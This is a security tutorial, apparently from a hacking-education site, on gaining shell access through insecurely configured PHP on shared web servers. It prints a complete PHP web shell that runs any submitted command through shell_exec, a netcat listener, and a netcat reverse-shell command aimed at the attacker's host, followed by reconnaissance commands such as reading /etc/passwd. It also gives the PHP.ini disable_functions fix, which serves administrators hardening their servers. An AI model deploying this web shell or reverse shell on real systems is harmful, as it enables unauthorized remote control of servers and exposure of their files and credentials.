Shoveling a Shell using PHP Insecurities

Many do not realize the amount of power that PHP can give a system user if it is not configured securely.  The problem this tutorial is about is not just a problem for web hosting companies. I come from the academic world where many universities give students and staff the ability to create their own web pages on a campus web server. Sometimes the users can even create ASP or PHP files for their website to make them more dynamic. With PHP installed and configured insecurely a user could run arbitrary programs on the system or in their web folder, seriously compromising system security. In this tutorial I will demonstrate this using a piece of software called Netcat ( http://www.atstake.com/research/tools/network_utilities/ ).

Netcat is like a Swiss Army knife for making TCP connections. For an attacker to shovel a shell from the target web server he first has to start Netcat listening for a connection on his box. For this tutorial I chose to use port 30, but a different port could work just as well. Here is the command issued on the attackers box to start listening for a connection on port 30:

    nc -l -p 30

At this point all the attacker has to do is upload Netcat to his web space on the target server and use the following PHP script (which you can also download as a zip file later in this page, it should work in both Windows and *nix):

<HTML>
<BODY>
<PRE>
<FORM METHOD="post" ACTION="cmd.php">
<INPUT TYPE="TEXT" NAME="command">
<INPUT TYPE="Submit">
</FORM>
<PRE>
<?
$command = str_replace("\\\\","\\",$_POST[command]);
echo "<B>Results for $command: </B><P>";
$results = str_replace("<","&lt;",shell_exec($command));
$results = str_replace(">","&gt;",$results);
echo $results;
?>
</PRE>
<P>
<B>If this script works add this line to your PHP.ini:</B>
<FONT color="#ff0000">disable_functions=system,exec,passthru,shell_exec</FONT>
</BODY>
</HTML>

and then issue the following command in the input form when the script is loaded from the website:

    nc AttackingBoxIP 30 -e cmd

The previous command shovels a shell back to the attacker, allowing the cracker command line access to the web server and from there he could leap frog to other machines and have his identity obscured as that of the web servers IP. Active Server Pages have similar functionality (Wscript.shell). Using methods similar to these, a user could view the source code of other Active Server Pages (possibly revealing ODBC passwords), or if the web servers file system is Fat32 (or the NTFS permissions are overly permissive), they could edit other web pages or system files. To help limit these risks always use NTFS with proper permissions (assuming it's a Windows box) and limit what functions a user can access (see http://www.php.net for information on using the safe_mode or disable_functions directive in PHP, see Microsoft Knowledgebase article Q278319 for limiting the use of Wscript.shell in Active Server Pages). In this case adding the following line to your PHP.ini file should suffice:

    disable_functions=system,exec,passthru,shell_exec

If you want to see if PHP is configured securely on your web server unzip the following file:

    http://irongeek.com/downloads/cmd.php.zip

into a web accessible directory and surf to it. This PHP script works on both Windows and Linux system (or any other OS that can use PHP). Once you have it in  a web accessible directory try some of these commands:

Windows:

    netstat
    netusers
    dir c: /s
    type some.file.name

Linux:

    df
    cat /etc/passwd

 

Printable version of this article